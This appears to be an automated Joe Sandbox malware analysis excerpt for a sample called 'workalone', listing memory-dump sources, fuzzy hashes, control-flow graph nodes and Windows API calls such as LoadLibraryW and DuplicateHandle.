                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: t%$l$t%$l$t%$l
                                                            • API String ID: 0-2282561593
                                                            • Opcode ID: e78f16b5947bc2d2717818b22cbde387fa704ac0d72bd455f0b951300e245754
                                                            • Instruction ID: a0c7a4c52c37caf91802c642343d1e2a4078497afabd7a3e99b63cfde5acc1f7
                                                            • Opcode Fuzzy Hash: e78f16b5947bc2d2717818b22cbde387fa704ac0d72bd455f0b951300e245754
                                                            • Instruction Fuzzy Hash: 41E1A170A042668FCF59CF75C4501ADFBF1BF95300B14CA6AE896EB241E774DA85CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 243 54dde10-54dde31 245 54dde75-54dde7c 243->245 246 54dde33-54dde39 243->246 247 54dde3f-54dde59 246->247 248 54de00b-54de064 246->248 255 54dde7d-54dde8c 247->255 256 54dde5b-54dde6a 247->256 252 54de06d-54de078 248->252 253 54de066-54de068 248->253 259 54de07e-54de08f 252->259 260 54de999-54dea49 252->260 257 54de98f-54de996 253->257 264 54dde70-54dde73 255->264 265 54dde8e-54dde9d 255->265 263 54ddf55-54ddf5e 256->263 256->264 270 54de091-54de0a0 259->270 271 54de0a2 259->271 329 54dea50-54deb0e 260->329 268 54ddf68-54de004 263->268 269 54ddf60-54ddf66 263->269 264->245 264->246 265->264 275 54dde9f-54ddea8 265->275 268->248 269->268 274 54de0a4-54de0d5 270->274 271->274 290 54de0d7-54de0eb call 54dcf58 274->290 291 54de0f3-54de11e 274->291 279 54ddeaa-54ddeb0 275->279 280 54ddeb2-54ddf4e 275->280 279->280 280->263 290->291 298 54de13c-54de15e 291->298 299 54de120-54de134 call 54dcf58 291->299 313 54de3b5-54de3bf 298->313 314 54de164-54de18a 298->314 299->298 317 54de3dd-54de3f5 313->317 318 54de3c1-54de3d5 call 54dcf58 313->318 333 54de190-54de19d 314->333 334 54de3a3-54de3af 314->334 517 54de3f7 call 54df660 317->517 518 54de3f7 call 54df652 317->518 318->317 357 54deb15-54debcc 329->357 330 54de3fd-54de45a 368 54de46d-54de4d2 call 54dc3b8 330->368 369 54de45c-54de465 330->369 333->329 345 54de1a3-54de1a7 333->345 334->313 334->314 346 54de1a9-54de1b5 345->346 347 54de1bb-54de1c1 345->347 346->347 346->357 351 54de1d5-54de220 347->351 352 54de1c3-54de1cf 347->352 378 54de299-54de29d 351->378 379 54de222-54de244 351->379 352->351 360 54debd3-54dec8a 352->360 357->360 416 54dec91-54dede3 360->416 408 54de4e4-54de4f0 368->408 409 54de4d4-54de4de 368->409 369->368 382 54de29f-54de2c1 378->382 383 54de316-54de34e 378->383 405 54de26d-54de28a 379->405 406 54de246-54de26b 379->406 410 54de2ea-54de307 382->410 411 54de2c3-54de2e8 382->411 438 54de377-54de394 383->438 439 54de350-54de375 383->439 445 54de292-54de294 405->445 406->445 417 54de4f6-54de4ff 408->417 418 54de5b1-54de5fa call 54dc3b8 408->418 409->408 409->416 452 54de30f-54de311 410->452 411->452 461 54dedea-54dee3b 416->461 421 54de505-54de50b 417->421 422 54dee42-54dee50 417->422 488 54de5fc-54de622 418->488 489 54de624-54de640 418->489 429 54de50d-54de513 421->429 430 54de523-54de556 421->430 447 54dedd5-54dede3 422->447 448 54dee52-54dee6c call 54dc280 422->448 435 54de515 429->435 436 54de517-54de521 429->436 454 54de558-54de56c call 54dcf58 430->454 455 54de574-54de5ab 430->455 435->430 436->430 483 54de39c-54de39e 438->483 439->483 445->257 447->461 472 54dee6e-54dee70 448->472 473 54dee71-54dee80 448->473 452->257 454->455 455->417 455->418 461->422 485 54dee8d-54dee91 473->485 486 54dee82-54dee8c 473->486 483->257 488->489 495 54de64e 489->495 496 54de642 489->496 495->257 496->495 517->330 518->330
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,~&j
                                                            • API String ID: 0-4218847650
                                                            • Opcode ID: 1a4128564019ab207b161e2a5a91220e6ea3d87f3c1066439a3decb65f76947b
                                                            • Instruction ID: b371152d1d59e8f2e88a1ceeeb1d8715b98683dbd462d9c649b020d83f691eb4
                                                            • Opcode Fuzzy Hash: 1a4128564019ab207b161e2a5a91220e6ea3d87f3c1066439a3decb65f76947b
                                                            • Instruction Fuzzy Hash: F0823075B002548FCB54DF64C898BADB7B2FF88211F1184AAE90A9B391DF349D45DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a8867839bbe4005993aec50c0555a57084e0a7a9377d711bb57b3cd61cf2e5c4
                                                            • Instruction ID: 28cc40703061904c8610f9bb6cb5aba47d562dac0c2a2bc785712cc08a92d304
                                                            • Opcode Fuzzy Hash: a8867839bbe4005993aec50c0555a57084e0a7a9377d711bb57b3cd61cf2e5c4
                                                            • Instruction Fuzzy Hash: 1BF0F475F042159F8B88DBB899406AE77F9BF89204B1044B9D929EB314EB35DE018B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8a4b4e32127199617992e5e0a7b3cabbd860854c04f5925947705b07a32605f
                                                            • Instruction ID: 785f01f898a4dd5a1fe24024086fecd3e581fe15a5d864fba6a5015902d5ca3f
                                                            • Opcode Fuzzy Hash: f8a4b4e32127199617992e5e0a7b3cabbd860854c04f5925947705b07a32605f
                                                            • Instruction Fuzzy Hash: 3812BC30B006188FDB58DF75C854AAEB7F6BF89214F1484A9E90ADB391DF349C46CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 989ec765a903f732ef971ca7a6c4d733c38e70859f864964cb05a03d05ffef0b
                                                            • Instruction ID: 5f7022d87e976c6e80816486f34f7f6b359ea421381dfe04b89cefa248c0336d
                                                            • Opcode Fuzzy Hash: 989ec765a903f732ef971ca7a6c4d733c38e70859f864964cb05a03d05ffef0b
                                                            • Instruction Fuzzy Hash: E4D19F71E04616CFCB69DF74C4501ADFBB2FF85304F258A69D446AB241EB38AA85CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 172 65eb464-65ec0a4 DuplicateHandle 174 65ec0ad-65ec0ca 172->174 175 65ec0a6-65ec0ac 172->175 175->174
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,065EBFD6,?,?,?,?,?), ref: 065EC097
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID: R
                                                            • API String ID: 3793708945-880014062
                                                            • Opcode ID: 648d1b851ea367c0b3dd41fb057ccd182a96f2a278e2732f2e0c1f7c6cc579d0
                                                            • Instruction ID: 72d231c551fc20163d9d8ec9c945843d160352b9958f7dcc9ed0d6d3ba268f2a
                                                            • Opcode Fuzzy Hash: 648d1b851ea367c0b3dd41fb057ccd182a96f2a278e2732f2e0c1f7c6cc579d0
                                                            • Instruction Fuzzy Hash: 0E2105B5D002489FDB10CF99D484AEEBBF4FB48310F14842AE918A7310C374A950CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 178 54d08e0-54d0954 GetConsoleWindow 181 54d095d-54d0982 178->181 182 54d0956-54d095c 178->182 182->181
                                                            APIs
                                                            • GetConsoleWindow.KERNELBASE ref: 054D0947
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWindow
                                                            • String ID: R
                                                            • API String ID: 2863861424-880014062
                                                            • Opcode ID: 5c7050963f01dfa60476c0e10ff7608ae2474a3521758b3f13ea5094725b0866
                                                            • Instruction ID: 6b1a47ff9c68d4eb674fae8ed2f0eb6006043b629f877e06379be66a9b0277a5
                                                            • Opcode Fuzzy Hash: 5c7050963f01dfa60476c0e10ff7608ae2474a3521758b3f13ea5094725b0866
                                                            • Instruction Fuzzy Hash: E2115BB1D002488FCB10CFAAC4487EFFBF4AB88324F10842AD419A7200D7789544CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 186 54d08e8-54d0954 GetConsoleWindow 189 54d095d-54d0982 186->189 190 54d0956-54d095c 186->190 190->189
                                                            APIs
                                                            • GetConsoleWindow.KERNELBASE ref: 054D0947
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWindow
                                                            • String ID: R
                                                            • API String ID: 2863861424-880014062
                                                            • Opcode ID: 36080a5ded1bf729e977dcbc00789a9c052032637370b238c2a0b482fcc5a075
                                                            • Instruction ID: ff53efaebdf32a496ed5cec47c4278042d799894fbd23c27901a99b30e7231f3
                                                            • Opcode Fuzzy Hash: 36080a5ded1bf729e977dcbc00789a9c052032637370b238c2a0b482fcc5a075
                                                            • Instruction Fuzzy Hash: 5F114871D043498FDB10DFAAC4987DFFBF4AB48224F14882AC159A7240DB79A944CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1629 65ec6cf-65ec6fd 1631 65ec6ff-65ec705 1629->1631 1632 65ec707 1629->1632 1633 65ec70d-65ec722 1631->1633 1632->1633 1643 65ec728 call 65ec78a 1633->1643 1644 65ec728 call 65ec798 1633->1644 1635 65ec72e-65ec744 KiUserExceptionDispatcher 1636 65ec746-65ec750 1635->1636 1637 65ec752 1635->1637 1638 65ec757-65ec759 1636->1638 1637->1638 1639 65ec75b-65ec783 1638->1639 1640 65ec770-65ec77c 1638->1640 1643->1635 1644->1635
                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 065EC73C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: DispatcherExceptionUser
                                                            • String ID:
                                                            • API String ID: 6842923-0
                                                            • Opcode ID: 3d139bd01fb81b779f3c43953e2f0d1dd08656d335c924600e992b5cd07ddda3
                                                            • Instruction ID: 1d7054b72493df85b177cbfaf29f6b1c3d12868ac1d04a8f4885eef09a4eabc8
                                                            • Opcode Fuzzy Hash: 3d139bd01fb81b779f3c43953e2f0d1dd08656d335c924600e992b5cd07ddda3
                                                            • Instruction Fuzzy Hash: D2116A79A05218DFCF94CFA8E4446AB7BE9FB45215F04487AD816E7201E738E905CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,065E45D6), ref: 065E4786
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: b91b16685633d0dabdf4c936321fc5ce41474cd47b2756f1c9d12989aaf3046c
                                                            • Instruction ID: d6504a7ea758c45299e3e024b05e9f40bf57732b238adfaf04bf73a6135c705a
                                                            • Opcode Fuzzy Hash: b91b16685633d0dabdf4c936321fc5ce41474cd47b2756f1c9d12989aaf3046c
                                                            • Instruction Fuzzy Hash: F41123B5C003488FCB10CFAAC844BCEFBF8AB89224F15846AD419B7210C779A546CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1645 65e40b8-65e4760 1647 65e4768-65e4793 LoadLibraryW 1645->1647 1648 65e4762-65e4765 1645->1648 1649 65e479c-65e47b9 1647->1649 1650 65e4795-65e479b 1647->1650 1648->1647 1650->1649
                                                            APIs
                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E28,?,?,065E45D6), ref: 065E4786
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: fe87406dd31b6266ba8e71154747ed478bd74ad09f6652d0578ed0713bfd1618
                                                            • Instruction ID: 597c6ec7a835126fd3da3c67674f84eaafb5367c342a58ef2c86ae3a2796ef1a
                                                            • Opcode Fuzzy Hash: fe87406dd31b6266ba8e71154747ed478bd74ad09f6652d0578ed0713bfd1618
                                                            • Instruction Fuzzy Hash: AC1112B5D007488FCB10DF9AD444B9EFBF8AB89224F15846AD519B7210C774A946CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 065EC73C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd
                                                            Similarity
                                                            • API ID: DispatcherExceptionUser
                                                            • String ID:
                                                            • API String ID: 6842923-0
                                                            • Opcode ID: ecc35578b21b3507bb05d25c17be3d96d7f88fdbd9a68798a42de409c1e6821f
                                                            • Instruction ID: fdbc8f716a6c43be9f7bb96fb7ebddc5795f2320998f6c7ae62bf70d8dc74e4a
                                                            • Opcode Fuzzy Hash: ecc35578b21b3507bb05d25c17be3d96d7f88fdbd9a68798a42de409c1e6821f
                                                            • Instruction Fuzzy Hash: 97F01C76601214CBDF24CF20E5446AB77A9FB85612B15887ADC15A3344D77CAD45CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_152d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12937dff2a171c385e2a35e3a0c1caa952aa6b098c17846c5f79f918e7e8f1fe
                                                            • Instruction ID: aedfdff8acb84ef1a5a1afe2eb9969826110068f80df6a582df9e0bcbe0143f7
                                                            • Opcode Fuzzy Hash: 12937dff2a171c385e2a35e3a0c1caa952aa6b098c17846c5f79f918e7e8f1fe
                                                            • Instruction Fuzzy Hash: E721F7B2504240DFCB15DF54D8C0B1ABBB5FB89314F24C669EA054F296C33AD816CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_152d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 028d30f194cddfcd2890b4eeb5acc37b0a589a64bf3f45996115ea06b4f5227e
                                                            • Instruction ID: 768d6e8becbf582ef1e1270d4fcbcf4a3b88d6aa4975b08a6779d13b42901ca2
                                                            • Opcode Fuzzy Hash: 028d30f194cddfcd2890b4eeb5acc37b0a589a64bf3f45996115ea06b4f5227e
                                                            • Instruction Fuzzy Hash: 4A2133B2504244DFDB25DF94C8C0B2ABBB1FB88324F248568E9094F286C336E845CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_153d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a58e49ebda9b6dd644e1371f2019be963028ddcdaca25f88ad5a42afd2c6e0bb
                                                            • Instruction ID: f9fd80a9674e84aba8da916bc4117ad90f53839a1714de537c3568c825aeea61
                                                            • Opcode Fuzzy Hash: a58e49ebda9b6dd644e1371f2019be963028ddcdaca25f88ad5a42afd2c6e0bb
                                                            • Instruction Fuzzy Hash: 7A2123B5508244DFDB01CF94D8C0B2ABBB5FBC4324F64C969E8494F246C37AD846CAA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_153d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 716601df4b15f1c1b3bb5a169d68d5d178848a5c6adad7291ce3775f5111aa7b
                                                            • Instruction ID: 683e8b1d8808eb6836652d5cc3ea0a38dad333c3fada333ca999c8c62b466173
                                                            • Opcode Fuzzy Hash: 716601df4b15f1c1b3bb5a169d68d5d178848a5c6adad7291ce3775f5111aa7b
                                                            • Instruction Fuzzy Hash: 292137B1504204EFCB01CFA4C5C0B26BBB5FBC8318F64C9ADE8094F282C376E805CA62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_152d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c68b780470a692cffba5d5c172d1dc2d37718c3676a307186d6e24ff2d5362e
                                                            • Instruction ID: dcd614602cd4e2db2bc802811403994a1404bab23944c5d80a9696c71aa307b3
                                                            • Opcode Fuzzy Hash: 0c68b780470a692cffba5d5c172d1dc2d37718c3676a307186d6e24ff2d5362e
                                                            • Instruction Fuzzy Hash: EC219D76404280DFCF16CF54D9C4B1ABF72FB89314F2886A9DD480A656C33AD466CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_152d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
                                                            • Instruction ID: 64359bdb8b1e3d5361cab43398c70fb956ff178a6183dfb9456f30397a9a9c6d
                                                            • Opcode Fuzzy Hash: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
                                                            • Instruction Fuzzy Hash: 4E119D76504280CFCB12CF54D5C4B5ABF71FB89320F2886A9D8494A656C336E45ACBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_153d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e2056ad9b9ef873465a40eadaffaa1e695ca515c10e19c4fea7bc9f37b489fc
                                                            • Instruction ID: 4b4e5b97ef138fbf3fea79dd322e02f1bb42f782151d18a7ad7cd6bab4255443
                                                            • Opcode Fuzzy Hash: 1e2056ad9b9ef873465a40eadaffaa1e695ca515c10e19c4fea7bc9f37b489fc
                                                            • Instruction Fuzzy Hash: 6A118F76504680DFDB12CF14D5C4B19FF71FB84324F28C6AAD8494B646C33AD84ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405953738.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_153d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac1c577071c2d0f69f9c0c2e3af2bcc6dc79f4eb61d5675d3e9761bf736dafb1
                                                            • Instruction ID: 8283c8e10ce21a016adff4017e4b40ba134324c8e563678ff9b99df6696e7155
                                                            • Opcode Fuzzy Hash: ac1c577071c2d0f69f9c0c2e3af2bcc6dc79f4eb61d5675d3e9761bf736dafb1
                                                            • Instruction Fuzzy Hash: F1119D75504280DFDB12CF54D5C4B19BFB1FB88328F28C6AAD8494F696C33AD45ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_152d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a548cfcde629fc885a0af99e48314ba9a71cbeb661c3f4e69df7ac72386ef37c
                                                            • Instruction ID: 1e80b2fcc6d2bfce40f1dad29fa9ed499f2566cd30d3eec45e00d89c5b92f6e5
                                                            • Opcode Fuzzy Hash: a548cfcde629fc885a0af99e48314ba9a71cbeb661c3f4e69df7ac72386ef37c
                                                            • Instruction Fuzzy Hash: A401FC720083549AE7104A65DC84B67BBF8FF46224F18C45AEE045F1C6C7B59844DA71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.405894363.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_152d000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 804228146d01f9dd5c05b3933de149d39aec89aa975dc92b3ffa3107e4ef8ea4
                                                            • Instruction ID: 703e319295db0c48b30174791ebd1d7b157f00a1dbabfc43792bcc02e12db4af
                                                            • Opcode Fuzzy Hash: 804228146d01f9dd5c05b3933de149d39aec89aa975dc92b3ffa3107e4ef8ea4
                                                            • Instruction Fuzzy Hash: 98F0F6724043949EEB208E0ADCC4B67FFB8EF81634F18C45AED085F286C3799844DAB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8998a765ccb464864dbb7ad52ae1865c0cb824700e6b6d98f284d329ceea16e8
                                                            • Instruction ID: f943eaf3a7903a7ffa5a7e4271edb06e92bec510e24672cb6b122e3aa3616431
                                                            • Opcode Fuzzy Hash: 8998a765ccb464864dbb7ad52ae1865c0cb824700e6b6d98f284d329ceea16e8
                                                            • Instruction Fuzzy Hash: AFD1CF35B002159FCB14DB78C464AAEB7F6FF88214B1584BAE906DB391DF34DC058BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%